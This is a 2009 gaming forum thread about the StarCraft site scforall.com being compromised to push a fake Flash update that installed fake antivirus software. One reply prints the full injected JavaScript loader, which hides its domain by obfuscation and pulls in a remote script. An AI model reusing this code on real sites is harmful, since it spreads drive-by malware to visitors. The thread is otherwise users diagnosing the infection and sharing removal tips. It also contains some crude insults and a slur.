EPTHas this been discussed anywhere? Yesterday I had to use an image because some virus or w/e I got on scforall ( yes i'm a dumbass and clicked on something that popped up ) crashed my comp. I just went on scforall 2 minutes ago and I thought I saw a glimpse at a headline saying the site was under attack but then my antivirus closed the website saying it was unsafe so I got scared... Anyone got any idea whats going on?
ScForAll unsafe...
| Forum Index > BW General |
|
JeanGuy
Canada18 Posts
Has this been discussed anywhere? Yesterday I had to use an image because some virus or w/e I got on scforall ( yes i'm a dumbass and clicked on something that popped up ) crashed my comp. I just went on scforall 2 minutes ago and I thought I saw a glimpse at a headline saying the site was under attack but then my antivirus closed the website saying it was unsafe so I got scared... Anyone got any idea whats going on? | ||
|
lac29
United States1485 Posts
| ||
|
Polar_Nada
United States1548 Posts
| ||
|
blabber
United States4448 Posts
http://www.teamliquid.net/forum/viewmessage.php?topic_id=102481 yes the flash update seems to be the source of the malware | ||
|
iLoveKT
Philippines3615 Posts
+ Show Spoiler + Hi, yesterday we had a problem with the SCForAll website, for some reason it was showing that the website was under attack by some malware, or that we might have been linked to a site hosting malware, so Google then decided to put an "Attack Site" picture on the front page. To sum everything up: 1. Google hates Korean applications. 2. SCForAll uses a Korean server to host the videos on, called Afreeca, just like the player you see live casted Starcraft games on. 3. Is there any virus or malware being distributed at SCForAll? NO. 4. Has this "Site Attack" sign been up in the past? Yes, last year there was a Site Attack sign, it was due to the same reason, and it was fixed once we saw the problem. 5. Do you still see the site attack sign? I personally don’t see it anymore, but deleting your cookies might help the problem, if not, the warning sign will go away shortly. Sorry for any inconvenience or worry you might of had. scforall | ||
Manifesto7
Osaka27146 Posts
| ||
|
JeanGuy
Canada18 Posts
 I had just changed some stuff on my comp and adobe wasnt installed for real so i thought it was a legit popup... i clicked it and then my desktop went angry blue color and told me to hide my wife and kids in a big white typing.. no joke | ||
|
JeanGuy
Canada18 Posts
On September 26 2009 13:09 Manifesto7 wrote: I get the warning everywhere afreeca is used. You get it in many TL blogs with image links too. it wasnt just a warning, it flat out closed the website lol | ||
|
JeanGuy
Canada18 Posts
On September 26 2009 13:10 JeanGuy wrote: it wasnt just a warning, it flat out closed the website lol on top of that, i got the popups all over my face right before the site closed | ||
|
nicoaldo
Argentina939 Posts
| ||
|
JeanGuy
Canada18 Posts
On September 26 2009 13:13 nicoaldo wrote: Artosis explained it in the site, afreeca is listed as a suspicious server by google, and scforall uses it. They are going to fix it soon i think. its not about afreeca being suspicious, you get popups like that guy said about some adobe shit and if you click it you're fucked and have to use an image to get your comp back to normal | ||
|
SonuvBob
Aiur21549 Posts
On September 26 2009 13:06 iLoveKT wrote: in case you still cant access scforall. (works fine for me) + Show Spoiler + Hi, yesterday we had a problem with the SCForAll website, for some reason it was showing that the website was under attack by some malware, or that we might have been linked to a site hosting malware, so Google then decided to put an "Attack Site" picture on the front page. To sum everything up: 1. Google hates Korean applications. 2. SCForAll uses a Korean server to host the videos on, called Afreeca, just like the player you see live casted Starcraft games on. 3. Is there any virus or malware being distributed at SCForAll? NO. 4. Has this "Site Attack" sign been up in the past? Yes, last year there was a Site Attack sign, it was due to the same reason, and it was fixed once we saw the problem. 5. Do you still see the site attack sign? I personally don’t see it anymore, but deleting your cookies might help the problem, if not, the warning sign will go away shortly. Sorry for any inconvenience or worry you might of had. scforall The very questionable flash popup makes me think that isn't the case this time. edit: upgraded flash (through the official site :p) and I don't get the popup now. Might be legit then, but it goes out of its way to look otherwise. | ||
|
AcrossFiveJulys
United States3612 Posts
| ||
|
JeanGuy
Canada18 Posts
On September 26 2009 13:16 SonuvBob wrote: The very questionable flash popup makes me think that isn't the case this time. edit: upgraded flash (through the official site :p) and I don't get the popup now. Might be legit then, but it goes out of its way to look otherwise. I clicked it once and I can tell you it's not legit in any way haha | ||
|
Initial_H.C.
Canada560 Posts
| ||
|
SonuvBob
Aiur21549 Posts
On September 26 2009 13:32 JeanGuy wrote: I clicked it once and I can tell you it's not legit in any way haha Yeah just noticed scforall loads a script from a russian site, which in turn tries to make you d/l that exe from phonester.com (both of which give you a 0 byte file if referer and user agent aren't set right) edit: tried scanning the file w/Kaspersky's online thing and Malwarebytes' Anti-Malware, both said it was clean... not that that really proves anything. edit2: now it's using warnerbrazas.com instead of zima07.ru. Both are the same IP (174.120.61.126) | ||
|
PanN
United States2828 Posts
| ||
|
Siz)Beggar
United States339 Posts
| ||
|
Doso
Germany769 Posts
Afreeca you say? Site-hack i say.... | ||
|
PanN
United States2828 Posts
On September 26 2009 15:18 Siz)Beggar wrote: if you click the adobe player update it viruses your computer you cant do anything to get rid of it except reformat the cpu or buy the software i had to learn the hard way q.q 1.) Why would you talk about something you have no idea about? You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine. 2.) You don't reformat a CPU, you reformat a harddrive. | ||
|
pR0gR4m3R
Spain1446 Posts
On September 26 2009 13:09 Manifesto7 wrote: I get the warning everywhere afreeca is used. You get it in many TL blogs with image links too. Google tells me before entering afreeca that is a badware website | ||
|
Mandalor
Germany2362 Posts
On September 26 2009 16:33 PanN wrote: 1.) Why would you talk about something you have no idea about? You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine. 2.) You don't reformat a CPU, you reformat a harddrive. 1) he's right. I had that happen to me about half a year ago. I tried every anti-virus/-malware program you can think of and it didn't help. 2) cpu is sometimes used as an abreviation for computer. We all knew what he was talking about anyway. | ||
motbob
United States12546 Posts
On September 26 2009 19:57 Mandalor wrote: 2) cpu is sometimes used as an abreviation for computer. What? lol | ||
|
Mandalor
Germany2362 Posts
 | ||
|
cyronc
218 Posts
sry i couldnt resist ... | ||
|
TheFoReveRwaR
United States10657 Posts
On September 26 2009 21:49 cyronc wrote: cpu is almost everytime used as an abrevation for central processing unit LOL =) sry i couldnt resist ... That was a real knee slapper. I had a virus(it couldve been an error too I suppose) recently that made it impossible to log in to windows. Could've been related. I can't remember exactly but I'm pretty sure I got it after doing an update to flash player. I thought it was odd because I had already updated flash player not too long ago but stupidly I did it anyway. | ||
|
50bani
Romania480 Posts
Artosis your site is infected! Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins | ||
|
PanN
United States2828 Posts
On September 27 2009 00:25 50bani wrote: It is malware!! Artosis your site is infected! Had to restore factory settings. I was running Opera under Win XP. The funny thing is I did not even try to download it, it started itself so to speak... I think it is an attack using the Adobe plug-ins Wait, you reformatted? | ||
|
RyanS
United States620 Posts
![[image loading]](http://img35.imageshack.us/img35/2218/capturenk.png) For those that posted earlier about the afreeca warning, this is not the same thing. I would avoid the site until it is fixed if you do not have a good anti-virus or can't spot a fake Adobe update page. ^.^ | ||
|
Doso
Germany769 Posts
| ||
|
50bani
Romania480 Posts
Yup. Restored factory contents to be more specific, since it is a "brand-name" computer. No problem saving stuff on DVD or USB stick but you have to reinstall stuff. | ||
|
Shikyo
Finland33997 Posts
On September 27 2009 02:45 50bani wrote: Yup. Restored factory contents to be more specific, since it is a "brand-name" computer. No problem saving stuff on DVD or USB stick but you have to reinstall stuff. Well, it of course can be a problem since the virus/worm/whatever could be in some of the files you saved. | ||
|
PanN
United States2828 Posts
On September 27 2009 02:45 50bani wrote: Yup. Restored factory contents to be more specific, since it is a "brand-name" computer. No problem saving stuff on DVD or USB stick but you have to reinstall stuff. I got the virus from site, didn't click anything. Ran a scan with mal-ware bytes, and spybot. Rebooted in safe mode, scanned again. Rebooted normally, computer was fine. You guys reformatting are insane. | ||
|
Monstah-_-
249 Posts
On September 26 2009 19:57 Mandalor wrote: 1) he's right. I had that happen to me about half a year ago. I tried every anti-virus/-malware program you can think of and it didn't help. 2) cpu is sometimes used as an abreviation for computer. We all knew what he was talking about anyway. LOL. You mean Central processing unit? | ||
|
Deleriux
10 Posts
If you check the page source right at the very bottom someone has inserted javascript. The javascript does this basically: Creates a string value such as: ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm (this is what I get) then removes all capital letters to get the site name which in my example is: xapserach.com It then proceeds to add a link to this website to the [ head ] html element to browsers that renders the page as a [ script ] element. So once the site is loaded your browser adds something like this - [ head ] [ script ] xapsearch.com attack site code goes here. [ /script ] [ /head ] I'm willing to bet whatever is hosted (or was hosted) there was even more javascript that installs exploits through peoples browsers. Please fix this. If you dont believe me open the page source yourself and you'll see the javascript. | ||
|
CoL_Fuehrer
Russian Federation124 Posts
On September 26 2009 16:33 PanN wrote: 1.) Why would you talk about something you have no idea about? You can get rid of it with many programs, mal-ware bytes, or spybot S&D would be fine. 2.) You don't reformat a CPU, you reformat a harddrive. Owned | ||
|
SonuvBob
Aiur21549 Posts
On September 27 2009 04:31 Deleriux wrote: Please fix this. If you dont believe me open the page source yourself and you'll see the javascript. Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall. | ||
|
Patriot.dlk
Sweden5462 Posts
Going full scans now | ||
|
TerraIncognita
Germany55 Posts
Tiny little pain in the ass but I got rid of it. It's strongly recommended to avoid this site, until this security problem has solved at 100%. For those, which got also infected: Malwarebytes cleaned this sucker perfectly. | ||
|
Alphonsse
United States518 Posts
| ||
|
ghermination
United States2851 Posts
http://www.scforall.com/news/news02.asp?mNum=n03&PageNo=1&where=&query=&sterm=&articleNum=644 While reading the "there is nothing wrong with the site" news post, i noticed this: + Show Spoiler + Is this still not a sign that SCForAll is not being hacked? At the very least, please investigate why your Russian friends are able to easily edit /include/bottom.asp to include their nifty javscript code that loads an external javascript file that, in turn, loads the popup offering the malware download. Heck, also investigate why I was able to edit this news info! So please for the sake of your users and fellow Starcraft fans at least truly investigate stuff first before saying nothing is wrong. apparently there are quite a few gaping security holes in scforall.com | ||
|
Amarxist
United States371 Posts
| ||
|
piratebay
United States399 Posts
on a more serious note, i shall d/l the file to spite my university~ | ||
|
Rebuke[SkyNet]
18 Posts
| ||
|
DrTJEckleburg
United States1080 Posts
| ||
|
OmniKnight
United States73 Posts
| ||
|
sashkata
Bulgaria3241 Posts
| ||
|
Foucault
Sweden2826 Posts
| ||
KizZBG
u gotta skate8152 Posts
On September 27 2009 04:47 SonuvBob wrote: Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall. PuertoRican? | ||
|
aKshun
Australia18 Posts
The code below executes a javascript command to create the "flash box" users are seeing. The first part of the code uses Cookies to only show the box on first entrance. Those of you who have been to the site, ignored the box and come back later to see if its still infected; will not see it if your cookies are enabled. Upon allowing the website to install the "flash update" i noted 2 processes running. A long number stream under administrator using about 20k of mem and install_flash_player.exe After a restart of the system, i have the very common "Total Security" fraudtool. http://www.bleepingcomputer.com/virus-removal/remove-total-security Code: + Show Spoiler + <script>function GetCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookieVal (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (GetCookie('x') == null) { var FoginosoteFalqe = 'ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm'.replace(/[A-Z]/g,''); var StudaliKqanuwupo = document.createElement('script'); StudaliKqanuwupo.src = 'http://' + FoginosoteFalqe + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(StudaliKqanuwupo); var JzatuveYeput = new Date (); JzatuveYeput.setTime(JzatuveYeput.getTime() + (8*3600*1000)); SetCookie('x','1',JzatuveYeput, '/'); }</script> Now, ScForAll aren't doing this on purpose, this is actually becoming one of the more common methods of malware dispersal through the internet. The infectious code is a little more advanced than the 1px by 1px iframes used by other fraudtools. ---- Contrary to what i read from other people, do not turn off your AV to use the website. Keep it up to date, when your AV blocks the attack; double-click the blue header and the frame is gone. | ||
|
Manifesto7
Osaka27146 Posts
| ||
|
Nytefish
United Kingdom4282 Posts
On September 27 2009 09:05 OmniKnight wrote: Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it I avoided it because I was too lazy to get an update. It's not that stupid to fall for something that looks like a flash player update. | ||
|
DrTJEckleburg
United States1080 Posts
On September 27 2009 09:05 OmniKnight wrote: Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it Next time I'll use repel. | ||
|
Tsagacity
United States2124 Posts
| ||
|
Catch]22
Sweden2683 Posts
edit: also, since when did this begin? chrome warned me from the very first time i entered the site | ||
|
aKshun
Australia18 Posts
so how do I check if I got infected, and how do i treat it? Most obvious is that you will have a massive "fake antivirus" tool saying your infected with a bazillion malware that don't exist. Restart your computer to confirm the above. If you are infected, if possible use an alternative PC to download Malwarebytes.org; rename the installer and then use it. | ||
|
SpiritWolf
United States127 Posts
On September 27 2009 11:13 Catch]22 wrote: so how do I check if I got infected, and how do i treat it? edit: also, since when did this begin? chrome warned me from the very first time i entered the site I was stupid enough to click the link. If you were infected you would know. I it is a fake anti-spyware program called total security. Malwarebytes was able to kill it but not before it edited my hosts.txt to block every major search engine. | ||
|
Initial_H.C.
Canada560 Posts
On September 27 2009 09:10 sashkata wrote: To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed. Thanks for the suggestion. I was wondering why I couldn't get into all the search engines and had no idea how to fix it. | ||
|
JohnColtrane
Australia4813 Posts
i'm pretty sure it was within september | ||
|
R1CH
Netherlands10340 Posts
Google reported badware activity on www.scforall.com/ between Sep 24th 2009 and Sep 24th 2009 Google reported badware activity on scforall.com/forums/ on Mar 5th 2009 Google reported badware activity on scforall.com/news/ on Mar 5th 2009 Google reported badware activity on scforall.com/prog/ on Mar 5th 2009 Google reported badware activity on www.scforall.com/prog/ on Mar 4th 2009 Google reported badware activity on www.scforall.com/news/ on Mar 3rd 2009 Google reported badware activity on www.scforall.com/forums/ on Aug 27th 2008 | ||
|
aKshun
Australia18 Posts
| ||
|
ChaoSbringer
Australia1382 Posts
The item in your system tray (for me) that was running Total Security was a bunch of numbers like 19242163 or something like that. I know this isn't Artosis' fault, but I'm pretty annoyed about this, perhaps you guys should edit http://www.teamliquid.net/forum/viewmessage.php?topic_id=101582 telling people not to use the website untill it's fixed, because I went there to look at one of the tutorials, and then got infected. | ||
|
CongoJack
Canada417 Posts
| ||
|
Alphonsse
United States518 Posts
I got "total security 2009" there about 2 weeks ago. Had no idea it was from scforall till people brought it up in this thread. I wouldn't have pressed 'yes' to any download, but I do remember times when adobe reader would open unexpectedly. | ||
|
Patriot.dlk
Sweden5462 Posts
| ||
Liquid`Jinro
Sweden33719 Posts
| ||
|
StalkerSC
Canada378 Posts
If I went to the site but didn't DL the fake adobe and the auto downloading shit..I shouldn't be infected right? Norton Antivirus is what I have, all up to date. | ||
|
Skeggaba
Korea (South)1556 Posts
| ||
|
aKshun
Australia18 Posts
If I went to the site but didn't DL the fake adobe and the auto downloading shit..I shouldn't be infected right? Norton Antivirus is what I have, all up to date. I believe you should be fine. Norton should have the signatures for the Pidief malware that was being delivered and they usually require some user input before your actually infected. Clean out your temporary internet files and cookies and if you like perform a scan with malwarebytes.org | ||
|
StalkerSC
Canada378 Posts
On September 28 2009 06:49 aKshun wrote: I believe you should be fine. Norton should have the signatures for the Pidief malware that was being delivered and they usually require some user input before your actually infected. Clean out your temporary internet files and cookies and if you like perform a scan with malwarebytes.org Thank you very much^^ | ||
|
d(O.o)a
Canada5066 Posts
 | ||
|
iSiN
United States1075 Posts
On September 27 2009 10:43 Manifesto7 wrote: I blame this on the LastShadow interview. roflmao wait is plexa going to close this thread now too you said his name mani! | ||
|
jimminy_kriket
Canada5501 Posts
| ||
|
LuckyFool
United States9015 Posts
nice ghost btw jim I see u've finally seen the light. | ||
|
Deleriux
10 Posts
| ||
|
jimminy_kriket
Canada5501 Posts
| ||
|
Empire
22 Posts
Anyways, here is the steps I did to get rid of it: 1. I yanked my power cord out of the PC to avoid windows saving the settings. Yes I know this is a bad taboo, but holding down the power button will cause windows to start saving settings. 2. Did a Last known good configuration reboot (F8 on startup). The last known good config still has the virus inside it, its just not fully installed yet. 3. Upon boot, immediately get a Task manager up and start looking as the processes as they load. One will load that is all Numbers (Like 1245783.exe) Immediately kill this process. Once this process is killed the virus will stop installing during this boot. From here you can proceed with removal 4. Malwarebytes (www.malwarebytes.org) is the software I used for removal. You also should do a Start---Run--MSconfig and remove the program from the startup tab just incase you lose power before malwarebytes finishes. Now, if you weren't able to get to the task manager fast enough and the virus installs, here are some steps to try and help: 1. Open up a command prompt and "Tasklist" This is the same screen as your task manager, but in a CLI format. If you can easily tell which program is hosting the virus, you can do a "Taskkill" command. I would format it like this: C:\taskkill /F /IM program1.exe /IM program2.exe /IM program3.exe This will allow you to kill all bad processes at once and will stop them from spawning more. Once all the viruses are stopped running, you can run Malwarebytes to remove the rest. I would also recommend using Combofix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix). The guide is pretty self explaintory Also, as people have mentioned, this virus does rape your host file. Unless you do some weird networking in your house, or you happen to get this virus on a work PC, I would just erase everything in the file and you should be good to go. Or, you can always just copy in the following from notepad: # Copyright (c) 1993-1999 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 127.0.0.1 localhost I work on PCs for a living, but virus removal is NOT one of my best traits, but if anyone has questions I will try to answer them. This community is so large that there is most likely several people a lot more knowledgeable than me here to help as well. | ||
|
StorrZerg
United States13919 Posts
but i can't wait for it to get fixed so i can watch the interviews at wcg (so epic) | ||
|
Empire
22 Posts
| ||
|
StorrZerg
United States13919 Posts
On September 30 2009 22:10 Empire wrote: I just checked it and its off of Google's block and firefox lets me go to it just fine now. I am not sure if their root cause of the hacks was fixed, but atleast I can watch some of the WCG stuff they've loaded so far Hope so, but i'm waiting for a mod or someone to confirm that its safe lol | ||
|
ceaRshaf
Romania4926 Posts
| ||
|
aKshun
Australia18 Posts
On September 30 2009 22:34 StorrZerg wrote: Hope so, but i'm waiting for a mod or someone to confirm that its safe lol Not sure what my word is worth. But the website is clean on a cookies-disabled browser. It also no longer has the offending code at the bottom of its page source. Was hit with neither False-Flash request or notification from my AV | ||
|
nicoaldo
Argentina939 Posts
| ||
|
PokePill
United States1048 Posts
Anyone have any clue how a site like this gets hacked so easily to the point where people can upload files and run scripts? Is it XSS or SQL injection from a poorly managed server database design or what? | ||
|
Integra
Sweden5626 Posts
On October 02 2009 03:06 PokePill wrote: Anyone have any clue how a site like this gets hacked so easily to the point where people can upload files and run scripts? Is it XSS or SQL injection from a poorly managed server database design or what? It was done from an add/message created by a third party on the website using javascript. | ||
|
Deleriux
10 Posts
On October 02 2009 03:06 PokePill wrote: Anyone have any clue how a site like this gets hacked so easily to the point where people can upload files and run scripts? Is it XSS or SQL injection from a poorly managed server database design or what? Its much simpler than that - the code is appended to the end of the main files. The attacker has write access to them. Normally thats due to stolen FTP credentials. How that happens - well - generally keyloggers on machines that have access to FTP on scforall.com. Most of the places one gets these keyloggers added to your system is through sites of a less than dignified nature  .These type of attacks are sourced from botnets (keylogger sends FTP details to a botnet, a few hours later the botnet logs in to add its malware to the site). In most cases what happens is the botnet keeps resubmitting its hacks to the site to reverse the affect where a webmaster has removed the bad lines of code from the website. I see this all the time in my line of work. I emailed the site maintainers with curative/preventative measures to help stop this - I gather that Artosis is not responsible for this - it appears he merely updates the site content via the in built control panels for the website. Needless to say if they dont clear out the malware on systems that have FTP access to this site the site will continue to get infected - regardless of how often they change the FTP password. So - be warned - the site might be OK now but infected again tomorrow. We'll just have to wait and get a reliable confirmation that the system that has caused all these problems is cleared and the problem is rectified. I'm not familiar with Korean ISPs but if they tend to hand out static IP addresses it makes it far simpler to just firewall off FTP access to scforall.com to only a list of authorized IPs. | ||
|
Eukarya
United States29 Posts
Is this coming up on any other SC sites? | ||
|
Flaccid
8835 Posts
Don't be a faggot Artosis. Take your site down and stop spamming links until you get this fixed. I'd rather get fucking Rick-Rolled. edit: here is what scforall installs on your computer and how to get rid of it | ||
| ||
